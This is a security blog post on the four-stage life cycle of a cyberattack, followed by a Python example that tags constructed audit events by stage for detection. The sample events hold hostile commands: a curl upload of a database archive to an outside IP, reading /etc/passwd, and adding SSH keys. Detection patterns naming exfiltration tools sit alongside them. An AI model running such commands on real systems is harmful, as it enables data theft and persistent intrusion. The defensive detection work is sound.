Cmd.com will be migrated to Elastic.co shortly.
By: Thaddeus Walsh
In the last blog, we discussed a handful of asymmetries that, together, explain the seemingly endless depth of cost and effort required to properly secure technology assets. In this piece, we’ll cover the life cycle of a cyberattack. This life cycle is universally consistent across cyberattacks, so we’ll be leaning on that consistency to upend the three asymmetries.
Life cycle: A series of stages through which something (such as an individual, culture, or manufactured product) passes during its lifetime.
It’s worth noting that most cyberattacks occupy more than one stage concurrently at some point in their life cycle, and only the first and final stages are inherently chronological.
Let’s begin with the end: what is the objective of any cyberattack? The final objective of any cyberattack can be framed as Value Extraction. Whether the attack is stealing intellectual property, mounting a Denial of Service, encrypting processes or files for ransom, cryptomining on the victim’s resources, or simply earning bragging rights with their friends, every attacker is trying to extract some value they couldn’t obtain otherwise.
Continuing to work backwards, a cyberattack must discover one or more assets to be leveraged in order to perform value extraction. In many cases, the attacker doesn’t know what value they’ll reap or how they will extract that value when they begin their attack. They must first Gather an Inventory of the environment that they’ve successfully penetrated. This inventory could include files, databases, software build processes, customer data, network topology, access to other networks, or nearly any knowledge of the victim or other potential victims.
Once that inventory has been gathered, the attacker will typically devise a way to leverage it to perform their value extraction. But, as we see with spray-and-pray ransomware, the attacker doesn’t necessarily make a direct decision about which assets to leverage or which value extraction method the attack will use. In most attacks, the inventory is gathered continuously at every stage, and that gathering is either directed (e.g. the attacker intends to compromise and ransom database servers) or undirected (e.g. long-dwelling APTs).
Most cyberattacks don’t proceed directly from initial compromise to inventory/value extraction. Prior to completing the Inventory stage, most modern attacks will go through a broad stage that we refer to as Establishment. This includes the actions that increase the attack’s resiliency: persistence, privilege escalation, and expansion.
When cyberattacks were first emerging, they were simple and targeted common software, but they were prone to failure and deteriorated in value over time as the environments they were built to autonomously compromise drifted further from the original target profile. Modern cyberattacks almost universally rely on command and control (C2) systems to remotely drive the attack. This dynamic capability increases both the likelihood of the attack’s success and the potential value that can be extracted from the victim. To make these more complex attacks durable against discovery and defenses, modern attacks will generally compromise additional assets to create redundant backdoors. This allows re-entry even if the victim discovers the attack in progress and intervenes. In order to create those points of redundancy and gather the most comprehensive inventory, the attack will typically attempt to achieve some form of escalated privileges, ideally achieving effective root access on as many hosts as possible.
Finally, taking one last step backwards, we arrive at the attacker’s initial Entry into the victim’s environment. This could be anything from an insider intentionally running a malicious payload to a well-meaning employee opening a malicious email attachment. There have been attacks that gain entry via API calls to unprotected endpoints, code injection on web app fields that lack data sanitization or validation, browser attacks via malicious ads, and, in 2021 specifically, software supply chain attacks in which a software vendor’s environment is compromised and the malicious payload is delivered to their customers’ systems.
Now, running the life cycle forward: the attacker has to obtain Entry into the victim’s environment. Next, the attacker will Establish itself by expanding, escalating privileges, and creating ways to resume the attack if discovered. All along the way, the attacker has been capturing data to Gather an Inventory of assets and information that will enable them to Extract Value. Historically, security has naturally put an extreme emphasis on stopping attacks at Entry, and that’s created a paradigm of perpetual reactivity.
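As an added illustration (not code from the original post, nor from Cmd or Elastic), here is a small Python tagger that maps constructed Linux host-audit events onto the four stages in the order the post runs them forward. The event format, the matching rules and the sample events are all assumptions made for the example; the point is the summary at the end, which shows how much of an intrusion an Entry-only defense never sees.

```python
"""Tag constructed host-audit events with a cyberattack life-cycle stage
(Entry, Establishment, Inventory, Value Extraction) and summarise progress.

Added example. The one-line event format, the regex rules and the sample
events are assumptions for illustration, not a real product's schema or
detection content.
"""
import re
from collections import Counter

STAGES = ("Entry", "Establishment", "Inventory", "Value Extraction")

# Constructed sample events: a single timeline on one host. The "detail" field
# is a simplified "<action> <arguments>" string (assumed format).
SAMPLE_EVENTS = [
    {"ts": "09:01", "host": "ws-17", "user": "jdoe", "detail": "login jdoe from 203.0.113.9"},
    {"ts": "09:02", "host": "ws-17", "user": "jdoe", "detail": "exec libreoffice -> bash"},
    {"ts": "09:04", "host": "ws-17", "user": "jdoe", "detail": "write /home/jdoe/.ssh/authorized_keys"},
    {"ts": "09:05", "host": "ws-17", "user": "jdoe", "detail": "exec crontab -e"},
    {"ts": "09:06", "host": "ws-17", "user": "jdoe", "detail": "exec sudo -i"},
    {"ts": "09:10", "host": "ws-17", "user": "root", "detail": "exec find / -name '*.sql'"},
    {"ts": "09:11", "host": "ws-17", "user": "root", "detail": "exec cat /etc/passwd"},
    {"ts": "09:20", "host": "ws-17", "user": "root", "detail": "exec tar czf /tmp/db.tgz /var/lib/mysql"},
    {"ts": "09:25", "host": "ws-17", "user": "root", "detail": "exec curl -T /tmp/db.tgz https://198.51.100.7/upload"},
    {"ts": "09:30", "host": "ws-17", "user": "svc-backup", "detail": "login svc-backup from 10.0.4.2"},
]

# Illustrative rules, checked in order; the first match wins. "10." is treated
# as the trusted internal range purely as an assumption for this example.
RULES = [
    ("Entry", re.compile(r"^login .* from (?!10\.)")),               # interactive login from outside
    ("Entry", re.compile(r"^exec (libreoffice|evince|thunderbird) -> ")),  # document/mail app spawning a shell
    ("Establishment", re.compile(r"authorized_keys|crontab|systemctl enable|sudo -i|chmod [ug]\+s")),
    ("Inventory", re.compile(r"^exec .*(find / |cat /etc/passwd|\bmount\b|ip route|mysql -e)")),
    ("Value Extraction", re.compile(r"^exec .*(curl -T|scp |openssl enc|xmrig)")),
]


def tag_event(detail: str):
    """Return the stage name for one event detail string, or None if no rule fires."""
    for stage, pattern in RULES:
        if pattern.search(detail):
            return stage
    return None


def tag_events(events):
    """Return copies of the events with a 'stage' key added (None when untagged)."""
    return [dict(e, stage=tag_event(e["detail"])) for e in events]


def stage_counts(tagged):
    """Count tagged events per stage; untagged events are left out."""
    return dict(Counter(t["stage"] for t in tagged if t["stage"]))


def furthest_stage(tagged):
    """The latest life-cycle stage any event reached, in the post's forward order."""
    reached = {t["stage"] for t in tagged if t["stage"]}
    return max(reached, key=STAGES.index) if reached else None


def activity_after_entry(tagged):
    """Events a defense focused only on Entry would never surface."""
    return [t for t in tagged if t["stage"] and STAGES.index(t["stage"]) > 0]


if __name__ == "__main__":
    tagged = tag_events(SAMPLE_EVENTS)
    for t in tagged:
        print(f"{t['ts']} {t['host']} {t['user']:<10} {str(t['stage']):<17} {t['detail']}")
    print("counts:", stage_counts(tagged))
    print("furthest stage:", furthest_stage(tagged))
    print("events past Entry:", len(activity_after_entry(tagged)))
```

Two of the ten constructed events are deliberately left untagged (the archive step and the internal service login), which is the realistic case: a stage model does not need every event classified, only enough signal at each stage that the defender is not waiting for the next Entry.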
Check back in for my next blog, where I talk about how to use your knowledge of the universal cyberattack life cycle to upend the Attacker-Defender asymmetry.